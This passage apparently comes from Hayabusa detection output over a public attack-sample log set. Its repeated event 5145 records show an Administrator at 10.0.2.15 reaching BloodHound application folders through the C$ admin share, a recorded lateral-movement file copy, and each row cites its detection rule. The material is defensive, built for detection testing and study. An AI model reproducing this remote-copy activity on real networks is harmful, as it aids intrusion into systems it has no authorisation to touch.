Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: 
\??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples : IP Address: 